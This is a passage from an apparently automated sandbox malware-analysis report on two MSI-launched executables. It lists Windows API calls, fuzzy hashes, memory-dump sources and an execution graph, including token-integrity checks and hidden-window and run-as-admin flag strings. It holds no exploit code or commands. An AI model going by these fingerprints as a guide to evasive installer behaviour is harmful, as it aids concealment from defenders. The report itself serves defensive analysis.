                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: cf24838cc7fc71b5c7cd1002dfc6886296181930d4932caad53f2affcd05348c
                                                                        • Instruction ID: 751dc9d46b0c25a661010d77e55f48ca418ff04c9525714bb6b8fde2dd9b1709
                                                                        • Opcode Fuzzy Hash: cf24838cc7fc71b5c7cd1002dfc6886296181930d4932caad53f2affcd05348c
                                                                        • Instruction Fuzzy Hash: 0121B2712083459FE711CF14C845B9BBBEAAB85300F04881EF99587292C734D918D7A2
                                                                        APIs
                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00AD8116
                                                                        • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,B7207CF4), ref: 00AD8185
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertFreeLocalString
                                                                        • String ID: Invalid SID
                                                                        • API String ID: 3201929900-130637731
                                                                        • Opcode ID: b2776f6eb30e6419cd1f6f8f8c9de3e51ef7ca761e3cace039890d6d483889f6
                                                                        • Instruction ID: 9604da557c21d1a05670496619a8855d9d35843419097ede116d66df3961de2e
                                                                        • Opcode Fuzzy Hash: b2776f6eb30e6419cd1f6f8f8c9de3e51ef7ca761e3cace039890d6d483889f6
                                                                        • Instruction Fuzzy Hash: 55219F71A00305ABDB10DF58C855BAFBBB8EB44B04F10864EE812A7380DBB96A458B90
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC16B
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADC1CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3988782225-1405518554
                                                                        • Opcode ID: bcd4f11f091085731ae793b36e1c9234e2023b9860a3be5ba5b9bf3354d8d7bc
                                                                        • Instruction ID: c8bf228862d0386e11d5160b76c6abba1cfc108dbaae58243fca2305aa0d93ca
                                                                        • Opcode Fuzzy Hash: bcd4f11f091085731ae793b36e1c9234e2023b9860a3be5ba5b9bf3354d8d7bc
                                                                        • Instruction Fuzzy Hash: C221FD70809B84EED721CF68C90478BBFF4EF15714F108A9EE08997781D7B5AA04CBA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 2427045233-2658103896
                                                                        • Opcode ID: 43fa79bdb98781ab86d646732d1e1a11bd6035551fb403a1cfe2c577ee761ce1
                                                                        • Instruction ID: d211f82bded0d7acd95ff286b850d21a585f11a784ed2411b43d391b04e0907f
                                                                        • Opcode Fuzzy Hash: 43fa79bdb98781ab86d646732d1e1a11bd6035551fb403a1cfe2c577ee761ce1
                                                                        • Instruction Fuzzy Hash: 7411E271D00785AEC725EFB4D912B8ABBF4AF18300F04896BF1A68B751EB30E504CB50
                                                                        APIs
                                                                          • Part of subcall function 00AE0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,B7207CF4,?,00B193B0,000000FF), ref: 00AE0B27
                                                                          • Part of subcall function 00AE0B00: GetLastError.KERNEL32(?,00000000,00000000,B7207CF4,?,00B193B0,000000FF), ref: 00AE0B31
                                                                        • IsDebuggerPresent.KERNEL32(?,?,00B2FAD8), ref: 00AE1E48
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B2FAD8), ref: 00AE1E57
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AE1E52
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3511171328-631824599
                                                                        • Opcode ID: 586c4a33544a094be3be1a92ae762031922106191bd49cd4f51369aa2a5825f1
                                                                        • Instruction ID: 2dc870fb26f48fd40e985298551b344c7ed661508814f438d84e1c9bc43f5cd5
                                                                        • Opcode Fuzzy Hash: 586c4a33544a094be3be1a92ae762031922106191bd49cd4f51369aa2a5825f1
                                                                        • Instruction Fuzzy Hash: D6E09270600751CFC320AF2AE5047967BE4AF04704FC0C85DE892C3340DBB4E884CB91
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,40000022,B7207CF4,?,00000000,?,?,?,?,00B19DA0,000000FF,?,00AD6432,00000000,?), ref: 00AD6CC4
                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,B7207CF4,?,00000000,?,?,?,?,00B19DA0,000000FF,?,00AD6432,00000000,?), ref: 00AD6CE7
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00B19DA0,000000FF,?,00AD6432,00000000), ref: 00AD6D87
                                                                        • LocalFree.KERNEL32(?,B7207CF4,00000000,00B193B0,000000FF,?,00000000,00000000,00B19DA0,000000FF,B7207CF4), ref: 00AD6E0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 8860f778cb40d78118b41817a044a9b69f7e5805a0b2771a39e8943bfe965830
                                                                        • Instruction ID: ef0d93fb26037283ce907285f923beac85861727e7429a9925d2a70829fc9f21
                                                                        • Opcode Fuzzy Hash: 8860f778cb40d78118b41817a044a9b69f7e5805a0b2771a39e8943bfe965830
                                                                        • Instruction Fuzzy Hash: 9C51A6B5A006059FDB18CF68D985BAEBBB5FB48310F14422EF856E7390DB35AD10CB94
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00AD4B05
                                                                        • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00AD4B25
                                                                        • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00AD4BAB
                                                                        • LocalFree.KERNEL32(00000000,B7207CF4,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00AD4C2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 1768e33e67e8b4eb6caa0b6ea03f9f7683e66a61e4e82833d2a176e554070db8
                                                                        • Instruction ID: 9f725b96d889e14a8f724177d6294d2de74637d257ae5e162399593e9bb74738
                                                                        • Opcode Fuzzy Hash: 1768e33e67e8b4eb6caa0b6ea03f9f7683e66a61e4e82833d2a176e554070db8
                                                                        • Instruction Fuzzy Hash: F051C072604215AFC715DF28D981A6AB7E9FB89360F140A6FF856D73A0DB70E9008B91

                                                                        Execution Graph

                                                                        Execution Coverage: 1.3%
                                                                        Dynamic/Decrypted Code Coverage: 0%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 344
                                                                        Total number of Limit Nodes: 5
                                                                        execution_graph 34490 ae7f70 34493 ae7fd0 GetTokenInformation 34490->34493 34494 ae804e GetLastError 34493->34494 34495 ae7fa8 34493->34495 34494->34495 34496 ae8059 34494->34496 34497 ae8069 codecvt 34496->34497 34498 ae809e GetTokenInformation 34496->34498 34499 ae8079 34496->34499 34497->34498 34498->34495 34502 ae8260 45 API calls 3 library calls 34499->34502 34501 ae8082 34501->34498 34502->34501 34503 b07e5e 34504 b07e6a __FrameHandler3::FrameUnwindToState 34503->34504 34529 b079c1 34504->34529 34506 b07e71 34507 b07fc4 34506->34507 34516 b07e9b ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 34506->34516 34576 b083bd 4 API calls 2 library calls 34507->34576 34509 b07fcb 34577 b1854c 23 API calls __CreateFrameInfo 34509->34577 34511 b07fd1 34578 b18510 23 API calls __CreateFrameInfo 34511->34578 34513 b07fd9 34514 b07eba 34515 b07f3b 34540 b084d8 34515->34540 34516->34514 34516->34515 34575 b18526 41 API calls 4 library calls 34516->34575 34518 b07f41 34544 af1a20 GetCommandLineW 34518->34544 34530 b079ca 34529->34530 34579 b0801c IsProcessorFeaturePresent 34530->34579 34532 b079d6 34580 b0ae59 10 API calls 2 library calls 34532->34580 34534 b079db 34535 b079df 34534->34535 34581 b18fb0 34534->34581 34535->34506 34538 b079f6 34538->34506 34640 b08e90 34540->34640 34542 b084eb GetStartupInfoW 34543 b084fe 34542->34543 34543->34518 34545 af1a60 34544->34545 34641 ae4ec0 LocalAlloc 34545->34641 34547 af1a71 34642 ae8ba0 34547->34642 34549 af1ac9 34550 af1add 34549->34550 34551 af1acd 34549->34551 34650 af0b70 LocalAlloc LocalAlloc 34550->34650 34697 ae8790 81 API calls __ehhandler$___std_fs_get_file_id@8 34551->34697 34554 af1ad6 34556 af1c26 ExitProcess 34554->34556 34555 af1ae9 34651 af0e90 34555->34651 34562 af1b2b 34669 aeae00 34562->34669 34564 af1bb4 34570 af1c08 34564->34570 34675 ae8e20 34564->34675 34565 af1b82 34565->34564 34566 ae29d0 44 API 
calls 34565->34566 34566->34564 34568 af1bef 34569 af1bfb 34568->34569 34568->34570 34698 af1400 CreateFileW SetFilePointer WriteFile CloseHandle 34569->34698 34699 ae4000 42 API calls 34570->34699 34573 af1c17 34700 af1c30 LocalFree LocalFree 34573->34700 34575->34515 34576->34509 34577->34511 34578->34513 34579->34532 34580->34534 34585 b2154e 34581->34585 34584 b0ae78 7 API calls 2 library calls 34584->34535 34586 b2155e 34585->34586 34587 b079e8 34585->34587 34586->34587 34589 b1c2f6 34586->34589 34587->34538 34587->34584 34590 b1c302 __FrameHandler3::FrameUnwindToState 34589->34590 34601 b172ca EnterCriticalSection 34590->34601 34592 b1c309 34602 b21abc 34592->34602 34595 b1c327 34617 b1c34d LeaveCriticalSection std::_Lockit::~_Lockit 34595->34617 34598 b1c338 34598->34586 34599 b1c322 34616 b1c246 GetStdHandle GetFileType 34599->34616 34601->34592 34603 b21ac8 __FrameHandler3::FrameUnwindToState 34602->34603 34604 b21af2 34603->34604 34605 b21ad1 34603->34605 34618 b172ca EnterCriticalSection 34604->34618 34626 b0c6b0 14 API calls std::_Stodx_v2 34605->34626 34608 b21ad6 34627 b0c5b2 41 API calls collate 34608->34627 34610 b1c318 34610->34595 34615 b1c190 44 API calls 34610->34615 34611 b21b2a 34628 b21b51 LeaveCriticalSection std::_Lockit::~_Lockit 34611->34628 34614 b21afe 34614->34611 34619 b21a0c 34614->34619 34615->34599 34616->34595 34617->34598 34618->34614 34629 b1c72b 34619->34629 34621 b21a1e 34625 b21a2b 34621->34625 34636 b1cddf 6 API calls std::_Lockit::_Lockit 34621->34636 34624 b21a80 34624->34614 34637 b1aa28 14 API calls 2 library calls 34625->34637 34626->34608 34627->34610 34628->34610 34635 b1c738 __cftoe 34629->34635 34630 b1c778 34639 b0c6b0 14 API calls std::_Stodx_v2 34630->34639 34631 b1c763 RtlAllocateHeap 34633 b1c776 34631->34633 34631->34635 34633->34621 34635->34630 34635->34631 34638 b215f6 EnterCriticalSection LeaveCriticalSection __cftoe 34635->34638 34636->34621 34637->34624 34638->34635 34639->34633 34640->34542 34641->34547 
34643 ae8bf2 34642->34643 34644 ae8c34 34643->34644 34647 ae8c22 34643->34647 34645 b07708 __ehhandler$___std_fs_get_file_id@8 5 API calls 34644->34645 34646 ae8c42 34645->34646 34646->34549 34701 b07708 34647->34701 34649 ae8c30 34649->34549 34650->34555 34652 af0ea4 34651->34652 34657 af1242 34651->34657 34653 af12a0 34652->34653 34652->34657 34709 ae83e0 14 API calls 34653->34709 34655 af12b0 RegOpenKeyExW 34656 af12ce RegQueryValueExW 34655->34656 34655->34657 34656->34657 34658 ae29d0 34657->34658 34659 ae29f1 34658->34659 34659->34659 34710 ae3b40 34659->34710 34661 ae2a09 34662 ae9110 34661->34662 34729 ae2a10 34662->34729 34664 ae9156 34747 ae98d0 34664->34747 34670 aeae0d 34669->34670 34671 aeae0a 34669->34671 34672 aeae1a 34670->34672 34795 b10f1e 42 API calls 2 library calls 34670->34795 34671->34565 34672->34565 34674 aeae2d 34674->34565 34676 ae8e69 34675->34676 34677 ae8e54 34675->34677 34796 ae5f90 GetCurrentProcess OpenProcessToken 34676->34796 34677->34568 34679 ae8e7c 34680 ae8f3e 34679->34680 34682 ae8e96 34679->34682 34681 ae1fc0 67 API calls 34680->34681 34683 ae8f65 34681->34683 34801 ae1fc0 34682->34801 34685 ae1fc0 67 API calls 34683->34685 34687 ae8f7a 34685->34687 34686 ae8eaa 34688 ae1fc0 67 API calls 34686->34688 34689 ae1fc0 67 API calls 34687->34689 34690 ae8ec7 34688->34690 34691 ae8f8b 34689->34691 34692 ae1fc0 67 API calls 34690->34692 34867 ae7660 34691->34867 34694 ae8ed5 34692->34694 34820 ae6ee0 34694->34820 34696 ae8eed 34696->34568 34697->34554 34698->34570 34699->34573 34700->34556 34702 b07710 34701->34702 34703 b07711 IsProcessorFeaturePresent 34701->34703 34702->34649 34705 b07bd9 34703->34705 34708 b07b9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34705->34708 34707 b07cbc 34707->34649 34708->34707 34709->34655 34711 ae3c15 34710->34711 34717 ae3b54 34710->34717 34727 ae3680 42 API calls collate 34711->34727 34712 ae3b60 _Yarn 34712->34661 34714 ae3b8d 34718 ae3c10 34714->34718 

                                                                        Control-flow Graph (graph image of function 00AE6EE0 not reproduced)
                                                                        APIs
                                                                          • Part of subcall function 00AE5F90: GetCurrentProcess.KERNEL32(00000008,?,1816BA6E), ref: 00AE5FA0
                                                                          • Part of subcall function 00AE5F90: OpenProcessToken.ADVAPI32(00000000), ref: 00AE5FA7
                                                                        • CoInitialize.OLE32(00000000), ref: 00AE6F55
                                                                        • CoCreateInstance.OLE32(00B2D310,00000000,00000004,00B3B320,00000000,?), ref: 00AE6F85
                                                                        • CoUninitialize.OLE32 ref: 00AE74F6
                                                                        • _com_issue_error.COMSUPP ref: 00AE7524
                                                                          • Part of subcall function 00AE1910: LocalFree.KERNEL32(?,1816BA6E,?,00000000,00B292C0,000000FF,?,?,00B41348,00000000,00AE16D0,80004005), ref: 00AE195C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                        • String ID: $
                                                                        • API String ID: 2507920217-3993045852
                                                                        • Opcode ID: aa09e96ee25152b04aee110d1a9d8191599d09954a065f866d97471c8e4bf60f
                                                                        • Instruction ID: f2057b686811854e97773855a0d6f9e0c3efbb04547946ad3f22af454ace403a
                                                                        • Opcode Fuzzy Hash: aa09e96ee25152b04aee110d1a9d8191599d09954a065f866d97471c8e4bf60f
                                                                        • Instruction Fuzzy Hash: F7229F70E08388DFEB11CFA9C948BADBBB8AF55304F248199E405EB291DB759E45CB11

                                                                        Control-flow Graph (graph image of function 00AE5F90 not reproduced)
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,1816BA6E), ref: 00AE5FA0
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AE5FA7
                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00AE5FDC
                                                                        • CloseHandle.KERNEL32(?), ref: 00AE5FF2
                                                                        Similarity
                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                        • String ID:
                                                                        • API String ID: 215268677-0
                                                                        • Opcode ID: abad2a91f0437567a8dbd5e5be88809f81c5112ebcc3fd6d2322b7dd940a70ac
                                                                        • Instruction ID: 6922055baecad877791a58ac50a29ea47b5d07074652a4565f3b601864e7c221
                                                                        • Opcode Fuzzy Hash: abad2a91f0437567a8dbd5e5be88809f81c5112ebcc3fd6d2322b7dd940a70ac
                                                                        • Instruction Fuzzy Hash: 27F01D74544301ABEB209F20EC59BABBBE8BB84704F508819F984C22A0D779D51EDA63

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(1816BA6E,?,0000FFFF), ref: 00AF1A4D
                                                                          • Part of subcall function 00AE4EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00AE4EDD
                                                                        • ExitProcess.KERNEL32 ref: 00AF1C27
                                                                          • Part of subcall function 00AE8790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AE880D
                                                                        Similarity
                                                                        • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                        • String ID: Full command line:
                                                                        • API String ID: 1878577176-831861440
                                                                        • Opcode ID: 114f97fcdb7c48ac0ee392466a59375ef421057e867695ec10c9aa0478bc296d
                                                                        • Instruction ID: 307fbd8bba3a21557f11ca3fdddd5010d13b3a482c6156b60e065ca5e70f667c
                                                                        • Opcode Fuzzy Hash: 114f97fcdb7c48ac0ee392466a59375ef421057e867695ec10c9aa0478bc296d
                                                                        • Instruction Fuzzy Hash: 49518E318101A8DBCF25EB61CD99BEEB7B5AF50300F1445D8E109A72A2EF741F49CBA1

                                                                        Control-flow Graph (graph image of function 00AE7FD0 not reproduced)
                                                                        APIs
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00AE7FA8,1816BA6E), ref: 00AE8044
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00AE7FA8,1816BA6E), ref: 00AE804E
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00AE7FA8,1816BA6E), ref: 00AE80AA
                                                                        Similarity
                                                                        • API ID: InformationToken$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 2567405617-0
                                                                        • Opcode ID: 5604f40d6c67ba6f07a75c37260d2cef4f5c0b9a6146d73cb220eb99927b62f3
                                                                        • Instruction ID: 6bd65d526abc37c23bdb3226b7cb4a47a3c9617eb25710f2f5e16ba1bbe8744e
                                                                        • Opcode Fuzzy Hash: 5604f40d6c67ba6f07a75c37260d2cef4f5c0b9a6146d73cb220eb99927b62f3
                                                                        • Instruction Fuzzy Hash: FD316F71A006159FD720CF59CC45BAFFBF9FB44710F10452DE519A7280DBB5A9048BA0

                                                                        Control-flow Graph (graph image of function 00B1C72B not reproduced)
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B1AFDA,00000001,00000364,?,00000006,000000FF,?,00B0C282,?,?,?), ref: 00B1C76C
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: d6da8dff3c3e48257a12c21db4ee8e04b989841a2e5e0933a0f07f5322aecf41
                                                                        • Instruction ID: 242879fb9992d2086391c74eb3139fd192d5e2d07ebd78e63bfcb6fe7cb5a504
                                                                        • Opcode Fuzzy Hash: d6da8dff3c3e48257a12c21db4ee8e04b989841a2e5e0933a0f07f5322aecf41
                                                                        • Instruction Fuzzy Hash: 29F0E93158163467EB312B659C49ADB3FCCDF52B71BA442D1AC04A71C0CFB0DC818AE1
                                                                        Similarity
                                                                        • API ID: _swprintf$FreeLocal
                                                                        • String ID: %$+
                                                                        • API String ID: 2429749586-2626897407
                                                                        • Opcode ID: 3d1c9b35e25b25dd7d06524dd49a622e886d5acde66daf71be0b679ddde3e544
                                                                        • Instruction ID: f23555cffdb56e072223e5f565107f59287e47ca944bdc056ef07a3fea6181ba
                                                                        • Opcode Fuzzy Hash: 3d1c9b35e25b25dd7d06524dd49a622e886d5acde66daf71be0b679ddde3e544
                                                                        • Instruction Fuzzy Hash: C802FF71E10259DFDB15DFA9CC40BAEBBB5FF49300F148629F911AB281DB34A941CBA1
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00AF12C4
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00B457C0,00000800), ref: 00AF12E1
                                                                        Similarity
                                                                        • API ID: OpenQueryValue
                                                                        • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                        • API String ID: 4153817207-1914306501
                                                                        • Opcode ID: 1d99275050034071f8fd85c865bb5fe46b9b975404381f95c3d32700610e177a
                                                                        • Instruction ID: e8a41c3db1ecd4fabde1b6e1bdb229d1cdc2d32471ba897b32c0edaf4ae10ea9
                                                                        • Opcode Fuzzy Hash: 1d99275050034071f8fd85c865bb5fe46b9b975404381f95c3d32700610e177a
                                                                        • Instruction Fuzzy Hash: E8E1F225A0435ACACB349F94C840A76B3E1EF95740F5985ADFB85CB296EB718C82C391
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00B23EC1,00000002,00000000,?,?,?,00B23EC1,?,00000000), ref: 00B23C3C
                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00B23EC1,00000002,00000000,?,?,?,00B23EC1,?,00000000), ref: 00B23C65
                                                                        • GetACP.KERNEL32(?,?,00B23EC1,?,00000000), ref: 00B23C7A
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: 8f80d25ece5ce68382fbf78115d1046a815d08fef2943aece5d3fe27bae23795
                                                                        • Instruction ID: 1f63324863083b81bd7c65d8198aa02dc451fcdc0de74dc913fa26f4a4282ce7
                                                                        • Opcode Fuzzy Hash: 8f80d25ece5ce68382fbf78115d1046a815d08fef2943aece5d3fe27bae23795
                                                                        • Instruction Fuzzy Hash: 8421B332700220BADB348F19E945A97B3E6EB50F60B5689A4E90EF7110E736DF41C350
                                                                        APIs
                                                                          • Part of subcall function 00B1AE3C: GetLastError.KERNEL32(?,00000008,00B203BC), ref: 00B1AE40
                                                                          • Part of subcall function 00B1AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B1AEE2
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B23E84
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00B23ECD
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00B23EDC
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B23F24
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B23F43
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                        • String ID:
                                                                        • API String ID: 415426439-0
                                                                        • Opcode ID: 49685535e6c223b511147ddb7a65d9220f66831fd9f539ea83e7f4978e11168f
                                                                        • Instruction ID: 55ef29504adc40854e2900c790fe61d8879509b3fef15feb9ba36ea7682aca64
                                                                        • Opcode Fuzzy Hash: 49685535e6c223b511147ddb7a65d9220f66831fd9f539ea83e7f4978e11168f
                                                                        • Instruction Fuzzy Hash: 70516172A00225ABDF20EFA5EC45AAE77F8EF48B00F1544A5E518E7150EB74DF488B61
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
